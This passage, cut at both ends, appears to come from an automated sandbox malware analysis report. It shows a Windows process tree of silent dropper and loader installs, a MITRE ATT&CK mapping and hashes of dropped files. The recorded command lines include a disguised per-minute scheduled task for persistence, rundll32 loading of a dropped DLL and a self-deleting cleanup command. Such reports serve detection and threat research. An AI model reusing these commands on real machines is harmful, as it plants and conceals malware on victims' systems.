                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cu2huck.2dl\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                      4⤵
                                                                                                                        PID:6848
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\0cu2huck.2dl\installer.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\0cu2huck.2dl\installer.exe /qn CAMPAIGN="654"
                                                                                                                          5⤵
                                                                                                                            PID:8460
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qnbpvmyr.n5p\ufgaa.exe & exit
                                                                                                                          4⤵
                                                                                                                            PID:8336
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\faks3iex.3o2\anyname.exe & exit
                                                                                                                            4⤵
                                                                                                                              PID:9172
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\faks3iex.3o2\anyname.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\faks3iex.3o2\anyname.exe
                                                                                                                                5⤵
                                                                                                                                  PID:6052
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\faks3iex.3o2\anyname.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\faks3iex.3o2\anyname.exe" -q
                                                                                                                                    6⤵
                                                                                                                                      PID:4884
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\deepenkk.jno\gcleaner.exe /mixfive & exit
                                                                                                                                  4⤵
                                                                                                                                    PID:8800
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\deepenkk.jno\gcleaner.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\deepenkk.jno\gcleaner.exe /mixfive
                                                                                                                                      5⤵
                                                                                                                                        PID:6068
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ueknm0c2.0ys\autosubplayer.exe /S & exit
                                                                                                                                      4⤵
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:2788
                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                1⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Modifies registry class
                                                                                                                                PID:5428
                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:5352
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-I4CCO.tmp\7vwDF4zkqCOLfu1soZ9q2zuz.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-I4CCO.tmp\7vwDF4zkqCOLfu1soZ9q2zuz.tmp" /SL5="$10486,138429,56832,C:\Users\Admin\Documents\7vwDF4zkqCOLfu1soZ9q2zuz.exe"
                                                                                                                                1⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                PID:6184
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-HSJD0.tmp\Setup.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-HSJD0.tmp\Setup.exe" /Verysilent
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  PID:6980
                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                    3⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    PID:3716
                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629281727 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                      4⤵
                                                                                                                                        PID:5260
                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                  1⤵
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  PID:5912
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding ACDF49A70684A7AF56DDA2E98EAFA29F C
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:5236
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding ED9202F56599063968BACFE35C821D79 C
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:8172
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 4F89B74A63200D51A4D13D0AC9371C5F C
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:6104
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 49E65631DF3DA4A2E3A583B8245C9CCC
                                                                                                                                    2⤵
                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                    PID:7964
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    PID:7636
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                      3⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:7176
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  1⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:2044
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  1⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  PID:3860
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  1⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  PID:8908
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:8924
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                  1⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:6132
                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                  PID:6176
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D9B8.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D9B8.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:7740
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\GmAtOoEjNd.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\GmAtOoEjNd.exe"
                                                                                                                                      2⤵
                                                                                                                                        PID:7736
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:2872
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\D9B8.exe"
                                                                                                                                        2⤵
                                                                                                                                          PID:8696
                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                            timeout /T 10 /NOBREAK
                                                                                                                                            3⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:8456
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2iABG7OPFX.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\2iABG7OPFX.exe"
                                                                                                                                          2⤵
                                                                                                                                            PID:9076
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                              3⤵
                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                              • Drops startup file
                                                                                                                                              PID:5764
                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                          1⤵
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          PID:7064
                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{799c3054-fd31-2e4f-a927-0c286589d450}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000174" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                            2⤵
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Drops file in Windows directory
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:3872
                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164"
                                                                                                                                            2⤵
                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Drops file in Windows directory
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            PID:8844
                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                          1⤵
                                                                                                                                            PID:5944
                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                            1⤵
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            PID:4988
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:6684
                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            PID:6892
                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                              2⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:9164
                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                            1⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:9064
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:8576
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:8452
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:6868
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:8388
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:1724
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:8032
                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                            PID:1520
                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                            C:\Windows\System32\svchost.exe -k wsappx -s ClipSVC
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            PID:8796
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:2104

                                                                                                                                          Network

                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                          Execution

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Persistence

                                                                                                                                          Modify Existing Service

                                                                                                                                          1
                                                                                                                                          T1031

                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                          1
                                                                                                                                          T1060

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Privilege Escalation

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Defense Evasion

                                                                                                                                          Modify Registry

                                                                                                                                          4
                                                                                                                                          T1112

                                                                                                                                          Disabling Security Tools

                                                                                                                                          1
                                                                                                                                          T1089

                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                          1
                                                                                                                                          T1497

                                                                                                                                          Install Root Certificate

                                                                                                                                          1
                                                                                                                                          T1130

                                                                                                                                          Credential Access

                                                                                                                                          Credentials in Files

                                                                                                                                          3
                                                                                                                                          T1081

                                                                                                                                          Discovery

                                                                                                                                          Software Discovery

                                                                                                                                          1
                                                                                                                                          T1518

                                                                                                                                          Query Registry

                                                                                                                                          7
                                                                                                                                          T1012

                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                          1
                                                                                                                                          T1497

                                                                                                                                          System Information Discovery

                                                                                                                                          7
                                                                                                                                          T1082

                                                                                                                                          Peripheral Device Discovery

                                                                                                                                          2
                                                                                                                                          T1120

                                                                                                                                          Remote System Discovery

                                                                                                                                          1
                                                                                                                                          T1018

                                                                                                                                          Collection

                                                                                                                                          Data from Local System

                                                                                                                                          3
                                                                                                                                          T1005

                                                                                                                                          Command and Control

                                                                                                                                          Web Service

                                                                                                                                          1
                                                                                                                                          T1102

                                                                                                                                          Replay Monitor

                                                                                                                                          Loading Replay Monitor...

                                                                                                                                          Downloads

                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                            MD5

                                                                                                                                            9499dac59e041d057327078ccada8329

                                                                                                                                            SHA1

                                                                                                                                            707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                            SHA256

                                                                                                                                            ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                            SHA512

                                                                                                                                            9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                            MD5

                                                                                                                                            9499dac59e041d057327078ccada8329

                                                                                                                                            SHA1

                                                                                                                                            707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                            SHA256

                                                                                                                                            ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                            SHA512

                                                                                                                                            9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                            MD5

                                                                                                                                            aed57d50123897b0012c35ef5dec4184

                                                                                                                                            SHA1

                                                                                                                                            568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                            SHA256

                                                                                                                                            096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                            SHA512

                                                                                                                                            ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                            MD5

                                                                                                                                            aed57d50123897b0012c35ef5dec4184

                                                                                                                                            SHA1

                                                                                                                                            568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                            SHA256

                                                                                                                                            096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                            SHA512

                                                                                                                                            ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                            MD5

                                                                                                                                            a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                            SHA1

                                                                                                                                            3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                            SHA256

                                                                                                                                            5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                            SHA512

                                                                                                                                            63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                            MD5

                                                                                                                                            a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                            SHA1

                                                                                                                                            3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                            SHA256

                                                                                                                                            5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                            SHA512

                                                                                                                                            63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                            MD5

                                                                                                                                            8690d4cc29a3c112ee7f6eb3981ac438

                                                                                                                                            SHA1

                                                                                                                                            9e1613d8880a003ac49e52150853673afcd7c8be

                                                                                                                                            SHA256

                                                                                                                                            68c926b002e8f4e0784481ea5b902f0a86991ef47787300c913c17821af510c9

                                                                                                                                            SHA512

                                                                                                                                            4caafb3cc066b7bb366e849117f86b36e5bc5bef48ee66e7a2fbab83c3613fe119946f80524423ccc85434223fd1aefeab472005e0d1f462101ba080c43286f3

                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                            MD5

                                                                                                                                            26effbd99d2f8c2ea955dcdcc606c69a

                                                                                                                                            SHA1

                                                                                                                                            31f1e1a11a5170d62b5f94021f2c515db4f3ee8a

                                                                                                                                            SHA256

                                                                                                                                            8add2a42d8b524bac492fb16745763489f527fed9b63824753e21c047ca0d34e

                                                                                                                                            SHA512

                                                                                                                                            8f2eac24ac929fa4f89469c23e5546d20dd2b7ce299e4d35254b3b7ab15f3380a875e7699095a545c883a2e9e311abadd1a4d8ee3421083c4c4b5293daa8d527

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pAlrwMY2B6TU8O10UJINpdUI.exe.log
                                                                                                                                            MD5

                                                                                                                                            41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                            SHA1

                                                                                                                                            5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                            SHA256

                                                                                                                                            df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                            SHA512

                                                                                                                                            234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zCskxqYHKHt5TUfvQe1PwBDu.exe.log
                                                                                                                                            MD5

                                                                                                                                            41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                            SHA1

                                                                                                                                            5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                            SHA256

                                                                                                                                            df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                            SHA512

                                                                                                                                            234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                            MD5

                                                                                                                                            b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                            SHA1

                                                                                                                                            d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                            SHA256

                                                                                                                                            fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                            SHA512

                                                                                                                                            98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-4OS38.tmp\Yvv1ErJnoIcxjB7OxLrQSFpE.tmp
                                                                                                                                            MD5

                                                                                                                                            ffcf263a020aa7794015af0edee5df0b

                                                                                                                                            SHA1

                                                                                                                                            bce1eb5f0efb2c83f416b1782ea07c776666fdab

                                                                                                                                            SHA256

                                                                                                                                            1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

                                                                                                                                            SHA512

                                                                                                                                            49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                            MD5

                                                                                                                                            7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                            SHA1

                                                                                                                                            1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                            SHA256

                                                                                                                                            a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                            SHA512

                                                                                                                                            3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                            MD5

                                                                                                                                            7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                            SHA1

                                                                                                                                            1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                            SHA256

                                                                                                                                            a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                            SHA512

                                                                                                                                            3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1651759.exe
                                                                                                                                            MD5

                                                                                                                                            f74c42768182cf95528b4d32db116680

                                                                                                                                            SHA1

                                                                                                                                            c557f307d1d29e0bedb0233361d7605a2e94109a

                                                                                                                                            SHA256

                                                                                                                                            d09b9025bf28610cb3def1d2c74fae649bb45a4ae8088cd21e65baa8d06d75f0

                                                                                                                                            SHA512

                                                                                                                                            f34d8dbc38c4fa0b5ae8fe3572b0e6428a5acf9494ce9dbe3e9c3c8274f8158c7340b29966221288e56baec22d0bb50dc4404990e413ffa61f0650a6107e953b

                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1651759.exe
                                                                                                                                            MD5

                                                                                                                                            f74c42768182cf95528b4d32db116680

                                                                                                                                            SHA1

                                                                                                                                            c557f307d1d29e0bedb0233361d7605a2e94109a

                                                                                                                                            SHA256

                                                                                                                                            d09b9025bf28610cb3def1d2c74fae649bb45a4ae8088cd21e65baa8d06d75f0

                                                                                                                                            SHA512

                                                                                                                                            f34d8dbc38c4fa0b5ae8fe3572b0e6428a5acf9494ce9dbe3e9c3c8274f8158c7340b29966221288e56baec22d0bb50dc4404990e413ffa61f0650a6107e953b

                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7592950.exe
                                                                                                                                            MD5

